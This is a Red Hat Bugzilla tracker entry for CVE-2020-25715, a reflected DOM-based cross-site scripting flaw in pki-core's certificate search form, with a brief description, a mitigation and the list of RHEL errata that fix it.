Bug 1891016 (CVE-2020-25715)
Summary: | CVE-2020-25715 pki-core: XSS in the certificate search results | ||
---|---|---|---|
Product: | [Other] Security Response | Reporter: | Cedric Buissart <cbuissar> |
Component: | vulnerability | Assignee: | Red Hat Product Security <security-response-team> |
Status: | CLOSED ERRATA | QA Contact: | |
Severity: | medium | Docs Contact: | |
Priority: | medium | ||
Version: | unspecified | CC: | abokovoy, alee, alexander.m.scheel, cfu, dsirrine, edewata, jmagne, kwright, mharmsen, mkdineshprasanth, psampaio, rhcs-maint, security-response-team |
Target Milestone: | --- | Keywords: | Security |
Target Release: | --- | ||
Hardware: | All | ||
OS: | Linux | ||
Whiteboard: | |||
Fixed In Version: | pki-core 10.9.0 | Doc Type: | If docs needed, set a value |
Doc Text: |
A flaw was found in pki-core. A specially crafted POST request can be used to reflect a DOM-based cross-site scripting (XSS) attack to inject code into the search query form which can get automatically executed. The highest threat from this vulnerability is to data integrity.
|
Story Points: | --- |
Clone Of: | Environment: | ||
Last Closed: | 2021-03-15 17:25:48 UTC | Type: | --- |
Regression: | --- | Mount Type: | --- |
Documentation: | --- | CRM: | |
Verified Versions: | Category: | --- | |
oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
Cloudforms Team: | --- | Target Upstream Version: | |
Embargoed: | |||
Bug Depends On: | 1426572, 1898055, 1903211, 1934142, 1934278, 1934676, 1934678, 1940561, 1945155, 1945156, 1945157 | ||
Bug Blocks: | 1891015 |
Description
Cedric Buissart
2020-10-23 14:42:25 UTC
Mitigation: Because the cross-site scripting (XSS) attack requires the victim to have their RHCS certificate installed in their web browser to be successful, it is recommended that web browser not hold the keys and that the user use the command line interface (CLI) instead. Created pki-core tracking bugs for this issue: Affects: fedora-all [bug 1934142] This issue has been addressed in the following products: Red Hat Enterprise Linux 7.6 Extended Update Support Via RHSA-2021:0819 https://access.redhat.com/errata/RHSA-2021:0819 This bug is now closed. Further updates for individual products will be reflected on the CVE page(s): https://access.redhat.com/security/cve/cve-2020-25715 This issue has been addressed in the following products: Red Hat Enterprise Linux 7 Via RHSA-2021:0851 https://access.redhat.com/errata/RHSA-2021:0851 Statement: Red Hat Enterprise Linux 8.3 (pki-core 10.9.4) contains mitigations that prevents the vulnerability to be exploited. Red Hat Enterprise Linux version 8 prior to 8.3 are vulnerable to this version This issue has been addressed in the following products: Red Hat Enterprise Linux 7.7 Extended Update Support Via RHSA-2021:0975 https://access.redhat.com/errata/RHSA-2021:0975 This issue has been addressed in the following products: Red Hat Enterprise Linux 8.2 Extended Update Support Via RHSA-2021:1263 https://access.redhat.com/errata/RHSA-2021:1263 |